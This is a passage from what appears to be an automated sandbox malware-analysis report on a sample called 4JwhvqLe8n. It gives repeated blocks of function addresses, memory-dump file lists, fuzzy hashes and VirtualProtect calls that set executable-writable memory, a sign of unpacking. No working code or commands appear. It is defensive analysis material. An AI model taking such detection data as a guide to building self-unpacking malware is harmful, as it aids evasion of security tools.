                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-1039757258
                                                                  • Opcode ID: a14636402641cdc90e2a3ae344e612cf7a413b34b7f0bff16f9358804314e8f4
                                                                  • Instruction ID: 35a6c91b93bcc543530c330e6d87c59423f88a8d6f3860633bbcfde72b804a63
                                                                  • Opcode Fuzzy Hash: a14636402641cdc90e2a3ae344e612cf7a413b34b7f0bff16f9358804314e8f4
                                                                  • Instruction Fuzzy Hash: 8BD135A1D082989BF7218624DC857EB7B79EF81310F1481FAD44D66281D27E1FC6CB67
                                                                  Function 0040AAFE Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 605memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-3058551535
                                                                  • Opcode ID: a925c94ffabaf015efd4f7eb9d6fa3693e8b66dee7b3c4d0b14de535cd6fcc3c
                                                                  • Instruction ID: e31c6f0428a1ad879084d030e7b3d80e503b2bf2136415014f88d123122c71be
                                                                  • Opcode Fuzzy Hash: a925c94ffabaf015efd4f7eb9d6fa3693e8b66dee7b3c4d0b14de535cd6fcc3c
                                                                  • Instruction Fuzzy Hash: 072247A2D041649BF7208A24DC84BEB7B79EF81310F1481FAD94D67681D67D1FC2CBA6
                                                                  Function 0040A9D8 Relevance: 47.7, APIs: 2, Strings: 25, Instructions: 412memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-3058551535
                                                                  • Opcode ID: c8ff61ae7923f3cb0b20b01443531368cd2783225380f890d4868acec7d31617
                                                                  • Instruction ID: d3bba2d6cd0b6a7d7d00e7274d5b21a2e9ebe1fb828867428a6b522fd52b3a50
                                                                  • Opcode Fuzzy Hash: c8ff61ae7923f3cb0b20b01443531368cd2783225380f890d4868acec7d31617
                                                                  • Instruction Fuzzy Hash: CBE148A2D082989BF7208624DC84BEB7B79DB91310F1481FED54D66281D27E0FC6CB66
                                                                  Function 0040ADBC Relevance: 47.7, APIs: 2, Strings: 25, Instructions: 409memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-3058551535
                                                                  • Opcode ID: e420d99aab8d8a40d7b77b49183ddae203b30ee2c4ae5c92981083dcb75b744e
                                                                  • Instruction ID: 55feaba93ad7e77a48e0621d9403177f2a566d95734184cbc5de5217829b400d
                                                                  • Opcode Fuzzy Hash: e420d99aab8d8a40d7b77b49183ddae203b30ee2c4ae5c92981083dcb75b744e
                                                                  • Instruction Fuzzy Hash: EFE126A2D082A49BF7218624DC847EB7B79EF91310F1481FAD54D67281D27D0FC6CBA6
                                                                  Function 0040AE15 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 400memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-3058551535
                                                                  • Opcode ID: f2b6b822a4df9635161e2a3e904afa6614a7ee560212dbeba7cc05792f73b947
                                                                  • Instruction ID: 913d053d6a4b87e8076cff9152b857ea02e6a9364de0a608fca4d402f9b139d6
                                                                  • Opcode Fuzzy Hash: f2b6b822a4df9635161e2a3e904afa6614a7ee560212dbeba7cc05792f73b947
                                                                  • Instruction Fuzzy Hash: 47E137A2D082A49BF7218624DC44BEB7B79DF91310F1481FAD54D66281D27E0FC6CBA7
                                                                  Function 0040AE1C Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 397memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-3058551535
                                                                  • Opcode ID: 50bd9d5ab837e02da883fdefca2b0946b567497e94e9fb5ec3c5763d0cae3670
                                                                  • Instruction ID: b89b7103d0fa27695ef78c0a4bb348488d698b876d94e036660cb1bab365a026
                                                                  • Opcode Fuzzy Hash: 50bd9d5ab837e02da883fdefca2b0946b567497e94e9fb5ec3c5763d0cae3670
                                                                  • Instruction Fuzzy Hash: 4FE126A2D082A49AF7218624DC447EB7B79DF91310F1481FAD54D6A281D27E0FC6CB67
                                                                  Function 0040AE38 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 395memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-3058551535
                                                                  • Opcode ID: 23ef9a7b39ce9d328e365ae41671bb2b66ede6d6743c8988016826178aa77dee
                                                                  • Instruction ID: 366b05091882c9197e83a7fdb40bb8b0b69c0581f31768dc85c13bca754d95be
                                                                  • Opcode Fuzzy Hash: 23ef9a7b39ce9d328e365ae41671bb2b66ede6d6743c8988016826178aa77dee
                                                                  • Instruction Fuzzy Hash: 77E136A2D082A49BF7218624DC447EB7B79EF91310F1481FAD54D67281D27E0FC6CB66
                                                                  Function 0040A954 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 393COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-3058551535
                                                                  • Opcode ID: 0ad95aec03d049a785a27f8ab78db8fc1a74cc6957920696c18b6f03b6a14bf5
                                                                  • Instruction ID: c6b4abe6201f42a9dc069e46274cd9b3491ae5b1b96948f19b1286337f56ceaf
                                                                  • Opcode Fuzzy Hash: 0ad95aec03d049a785a27f8ab78db8fc1a74cc6957920696c18b6f03b6a14bf5
                                                                  • Instruction Fuzzy Hash: 80E146A2D082A49AF7218624DC44BEB7B79DF91310F1481FED44D6A281D27E0FC6CB67
                                                                  Function 0040AAB2 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 392memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-3058551535
                                                                  • Opcode ID: 2b65a9afca3fe0157da0e974b2c5d5dd3769f05387e5c7f4a3326f01f4ef5363
                                                                  • Instruction ID: ed8e06320c1ad1f63d05f356348c29088993c0ffd5424871ee90d4ef865e1f34
                                                                  • Opcode Fuzzy Hash: 2b65a9afca3fe0157da0e974b2c5d5dd3769f05387e5c7f4a3326f01f4ef5363
                                                                  • Instruction Fuzzy Hash: 58D145A2D082A49AF7218624DC44BEB7B79EF91310F1481FED54D66281D27E0FC6CB67
                                                                  Function 0040AAAD Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 389memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-3058551535
                                                                  • Opcode ID: dbc8291b70dba38dcb1408b8221c043063f75e451019f64f739a7bf78c75daa9
                                                                  • Instruction ID: d7a296b10f212e9af49ab3c416a3833ced58286689dd1539334ceac151fafce4
                                                                  • Opcode Fuzzy Hash: dbc8291b70dba38dcb1408b8221c043063f75e451019f64f739a7bf78c75daa9
                                                                  • Instruction Fuzzy Hash: A2D146A2D082949AF7218624DC44BEB7B79EF91310F1481FED54D6A281D27E0FC6CB67
                                                                  Function 0040AAC9 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 382memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                  Strings
                                                                  Memory Dump Source
